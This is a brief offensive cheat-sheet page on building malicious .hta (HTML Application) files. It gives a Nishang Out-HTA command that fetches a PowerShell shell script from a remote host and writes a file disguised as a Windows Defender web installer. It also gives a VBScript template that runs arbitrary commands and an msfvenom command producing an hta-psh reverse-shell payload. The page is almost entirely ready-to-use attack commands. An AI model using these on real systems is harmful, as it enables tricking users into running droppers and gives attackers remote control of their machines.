.hta exploit

.HTA exploit

Nishang Out-HTA.ps1

REQUIREMENT:

PS> . .\Out-HTA.ps1
PS> Out-HTA -PayloadURL http://IP/shell.ps1
HTA written to \WindDef_WebInstall.hta

Manual Script

<script language="VBScript">
	Function DoStuff()
		Dim wsh
		Set wsh = CreateObject("Wscript.Shell")
		wsh.run "COMMAND"
		Set wsh = Nothing
	End Function

DoStuff
self.close
</script>

msf

msfvenom -p OS_SPECIFIC_PAYLOAD LHOST= LPORT= -f hta-psh -o FILE.hta

Last updated